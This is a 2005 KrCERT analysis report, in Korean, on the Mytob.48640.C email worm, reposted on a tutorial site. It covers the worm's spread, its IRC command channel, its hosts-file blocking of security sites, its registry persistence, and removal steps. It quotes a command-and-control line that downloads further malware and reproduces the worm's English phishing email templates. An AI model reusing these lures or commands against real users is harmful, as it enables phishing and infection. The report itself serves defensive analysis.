강좌
클라우드/리눅스에 관한 강좌입니다.
리눅스 분류

Mytob.48640.C 웜 분석 보고서

작성자 정보

  • 웹관리자 작성
  • 작성일

컨텐츠 정보

본문

KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
Mytob.48640.C 웜 분석 보고서
2005. 10. 17
인터넷침해사고대응지원센터 (KISC)
※ 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]를 명시하여 주시기 바랍니다.
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 1 -
□ 개 요
Mytob 변종은 메일 첨부를 통하여 전파되는 웜이다. 감염 시 시스템 폴더
에 웜 파일복사 및 레지스트리가 추가되며, 감염 후 일부 보안 프로그램의 실
행을 종료시키는 것으로 관찰되었다.
감염 후 IRC 서버로의 접속시도가 관찰되었으므로, 명령전달 통한 추가적인
악성행위가 발생할 가능성이 있다.
o 관련 포트 트래픽 동향
※ 2005. 10.16 현재 국내 TCP 25 포트(SMTP) 트래픽 추이에 이상 징후가 없는 것
으로 관찰됨
<2005.10.11 ~ 2005.10.16 TCP 25 포트 트래픽 (bps, pps) 변동 추이>
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 2 -
o 웜 파일명 및 크기, 형태
파일명 파일크기 형태
picx.exe 48,640 byte PESpin
<웜 파일 형태 확인>
□ 주요 공격 및 전파 기법
o 공격 절차
- Mytob.48640.C은 메일을 발송하여 자신을 전파한다. 메일 발송 시 웜 자신
을 파일로 첨부하며, 메일의 본문에 사용자가 해당 첨부파일을 클릭 하도록
유도하는 내용을 담는다. 메일 공격 대상 주소는 PC 내에 저장되어 있는
파일들로부터 추출한다. 또한 감염 후 특정 IRC 서버로의 접속을 시도하
는데, 해당 서버로부터 명령을 전달 받을 경우 웜이 기능이 향상된 버전으
로 업데이트 되거나 추가적인 악성코드가 설치될 가능성이 있다. 10.16
20:00 현재, 해당 IRC 서버에 대한 접속이 가능한 것으로 관찰되었다.
<공격 요약>
Step 1. 감염된 PC의 웜이 PC내의 파일로부터 메일 주소를 추출한 후에
해당 주소로 웜 파일을 첨부하여 메일을 발송한다
Step 2. 또한 IRC서버에 접속하여 웜 제작자로부터 명령을 전달 받아 추가
적인 악성행위를 한다.
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 3 -
o 백도어 트래픽 분석
감염 후, 웜은 공격자가 구성해 놓은 IRC 서버(rax.ou[생략].info)로 접근하여
웜 제작자로부터 명령을 전달 받는다. 웜은 스스로 해당 사이트에 접근하므
로, 네트워크 방화벽이 우회될 수 있다.
2005.10.16 20:00 현재, 백도어 통신에 대한 상세한 내용은 다음과 같다.
i) 웜은 DNS 쿼리를 통하여 rax.ou[생략].info 도메인에 대한 IP 140.[생
략].220.121 를 얻는다.
ii) 웜은 140.[생략].220.121 서버의 tcp27999번 포트로 접속하여 "#my"채널에
Join한다. Join후에는“.hell.download http://www.flig[생략].com/nail.exe
3.22 -u” 명령을 전달 받는다.
< IRC 통한 명령 전달 예 >
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 4 -
※ 해당 명령은 악성코드 추가 다운로드 명령으로 실제 명령 전달 후 감염 PC에서는
아래와 같이 http://www.flight[생략].com/ 로 부터 nail.exe 악성코드가 다운로드
되는 것으로 관찰되었다.
iii) 또한, 웜은 140.[생략].220.121 의 tcp 43287번 포트로 접속하여, “#r0x” 채
널에 Join 한 후, “.hell.mailstart” 명령을 전달 받는다. 해당명령은 웜 전
파메일 첨부 공격을 시작하기 위한 명령인 것으로 보인다.
< IRC 통한 명령 전달 예>
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 5 -
o 웜이 발송하는 메일 유형 분석
사용자가 웜이 발송한 메일의 첨부파일을 부주의 하게 실행하였을 경우 감염
되게 된다. 웜이 발송하는 메일 형식은 다음과 같이 관찰되었다.
* 제목, 내용, 첨부 파일 명은 아래와 같다. 웜은 여러 가지 메일 형태 중 하
나를 선택하여 메일을 발송한다. 다음은 웜 파일에 코딩되어 있는 메일 유
형 및 처리 루틴 예이다 .
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 6 -
메일 형태를 정리해 보면 다음과 같다.
o 메일 제목 : 다음 내용 중 하나가 선택된다.
- Your password has been updated
- Your password has been successfully updated
- You have successfully updated your password
- Your new account password is approved
- Your Account is Suspended
- *DETECTED* Online User Violation
- Your Account is Suspended For Security Reasons
- Warning Message: Your services near to be closed.
- Important Notification
- Members Support
- Security measures
- Email Account Suspension
- Notice of account limitation
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 7 -
o 메일 내용: 다음 내용 중 하나가 선택된다.
<Case1>
Dear [가변 문자열] Member,
We have temporarily suspended your email account .
This might be due to either of the following reasons:
1. A recent change in your personal information (i.e. change of address).
2. Submiting invalid information during the initial sign up process.
3. An innability to accurately verify your selected option of subscription due to an internal
error within our processors.
See the details to reactivate your [가변 문자열] account.
Sincerely,The [가변 문자열] Support Team
+++ Attachment: No Virus (Clean)
+++ [가변 문자열] Antivirus - www.[가변 문자열]
<Case2>
Dear user [가변 문자열] ,
It has come to our attention that your [가변 문자열] User Profile ( x ) records are out
of date. For further details see the attached document.
Thank you for using [가변 문자열] !
The [가변 문자열] Support Team
+++ Attachment: No Virus (Clean)
+++ [가변 문자열] Antivirus - www.[가변 문자열]
<Case3>
You have successfully updated the password of your [가변 문자열] account.
If you did not authorize this change or if you need assistance with your account,
please contact [가변 문자열] customer service at: [가변 문자열]
Thank you for using [가변 문자열]
The [가변 문자열] Support Team
+++ Attachment: No Virus (Clean)
+++ [가변 문자열] Antivirus - www.[가변문자열]
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 8 -
<Case4>
Dear [가변 문자열] Member,
Your e-mail account was used to send a huge amount of unsolicited spam messages
during the recent week. If you could please take 5-10 minutes out of your online
experience and confirm the attached document so you will not run into any future
problems with the online service.
If you choose to ignore our request, you leave us no choice but to cancel
your membership.
Virtually yours,
The [가변 문자열] Support Team
+++ Attachment: No Virus found
+++ [가변 문자열] Antivirus - www.[가변 문자열]
o 메일 첨부 이름 : 다음 중 하나가 선택된다.
- account-password
- updated-password
- email-details
- email-password
- document
- new-password
- important-details
- password
- approved-password
- account-details
- accepted-password
- readme
- account-info
- account-report
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 9 -
□ OS 변경 사항
- 파일 생성
아래와 같은 파일이 생성되는 것으로 관찰되었다.
․윈도우 시스템 폴더에 picx.exe 파일이 만들어 진다.
※ 윈도우 시스템 폴더: WinNT,2000 c:winntsystem32
WinXP c:Windowssystem32
- 레지스트리 변경/추가 발생
웜은 재 부팅 시에도 메모리에 다시 로딩되게 하기 위하여 레지스트리에
자신을 등록해 놓는다. 등록되는 레지스트리는 다음과 같다
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 10 -
□ 감염 후 특이 사항
감염 시 일부 보안관련 사이트 접속에 장애가 발생한다. 웜은 주요 보안 사
이트에 대한 접속을 차단하기 위하여 windowssystem32driversetchosts
파일에 아래의 내용을 추가한다.
해당 도메인들의 IP 주소가 loopback으로 고정되게 되어 접속 장애가 발생한

<웜에 의하여 hosts 파일에 내용이 추가됨>
host 파일에 추가되는 도메인은 아래와 같다.
127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 11 -
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.amazon.com
127.0.0.1 www.amazon.co.uk
127.0.0.1 www.amazon.ca
127.0.0.1 www.amazon.fr
127.0.0.1 www.paypal.com
127.0.0.1 paypal.com
127.0.0.1 moneybookers.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.ebay.com
127.0.0.1 ebay.com
또한, 웜은 감염 후 일부 보안 프로그램 및 웜 분석에 사용 될 수 있는 프로그
램들을 종료시킨다. 종료 대상 프로그램은 웜에 다음과 같이 코딩되어 있다.
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 12 -
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 13 -
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 14 -
□ 네트워크 영향력 / 공격력
o 감염 후 메일 발송 빈도를 관찰한 결과는 다음과 같다.
※ 수치는 시험환경에 따라 달라질 수 있다.
항 목 관찰 결과
분당 메일 공격 빈도 38 회
<분당 메일 공격 시도 횟수 샘플>
아래 화면은 감염PC에서 1분 동안 발생하는 트래픽 중, 웜 전송을 위하여 메일서
버로 접속을 시도하는 횟수를 추출한 결과이다.
o 타 웜과의 공격력 비교
□ 국내 외 피해 현황
o 10/16 20:00 현재 국외에서 피해 건수가 일부 관찰되고 있지만, 국내에서는
현재까지 아직 큰 피해 발생이 보고되지 않았다.
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 15 -
□ 위험 요소 및 향후전망
o 공격 메일 문구가 영문이므로 국내에서는 첨부파일을 클릭하는 사용자들이
많지는 않을 것으로 예상된다.
그러나 IRC 서버를 통하여 악의적인 명령을 전달하여, 공격력이 향상된 웜
으로의 업데이트 (SMTP 공격력 향상 및 RPC, LSASS, PnP 취약점 공격모듈
추가 등) 되거나 기타 추가적인 악의적인 행위 가능성이 있다. 2005.10.16
20:00 현재, 해당 사이트 rax.ou[생략].info (tcp 27999, 43287) 접속이 가능하
므로, 감염 시 웜은 해당 IRC 서버로부터 명령을 전달 받게 된다.
따라서, 해당 사이트에 대한 신속한 대응 조치가 바람직하다.
□ 예방 및 대응 방안
o 네트워크 관리자
- 바이러스 월의 패턴이 최신으로 업데이트 되었는지 확인한다
- rax.ouc[생략].info 도메인 쿼리 트래픽을 차단하도록 한다
o 사용자
- 확인되지 않은 메일의 첨부 파일은 실행 시키지 않는다
- 백신 업데이트를 신속히 실시한다
□ 감염 확인 및 조치 방법
o 감염 확인 방법
시스템 폴더에 48,640 byte 크기의 picx.exe 파일이 존재하는지 확인한다.
해당 파일이 존재한다면 감염된 것으로 보아야 한다
※ 윈도우 시스템 폴더: WinNT,2000 c:winntsystem32
WinXP c:Windowssystem32
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 16 -
o 감염 시 치료 방법
Step1. PC를 안전 모드로 부팅한다. 부팅 시 F8을 누르고 있으면 아래 화면
이 뜨게 된다. 이때 “안전 모드”를 선택한다
Step2. 아래와 같이 웜이 생성한 레지스트리를 삭제한다.
시작 → 실행 클릭 후 regedit 입력
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun 에서
"PIC SYSTEM picx.exe " 를 삭제한다
KrCERT-AR-2005-99 http://www.krcert.or.kr
Mytob.48640.C 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
- 17 -
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices
에서 “PIC SYSTEM picx.exe“를 삭제한다
Step3. 시스템 폴더에 있는 picx.exe 파일을 삭제한다.
※ 윈도우 시스템 폴더: WinNT,2000 c:winntsystem32
WinXP c:Windowssystem32
Step4. PC를 재부팅 한다.

관련자료

댓글 0
등록된 댓글이 없습니다.

공지사항


뉴스광장


  • 현재 회원수 :  60,156 명
  • 현재 강좌수 :  36,513 개
  • 현재 접속자 :  227 명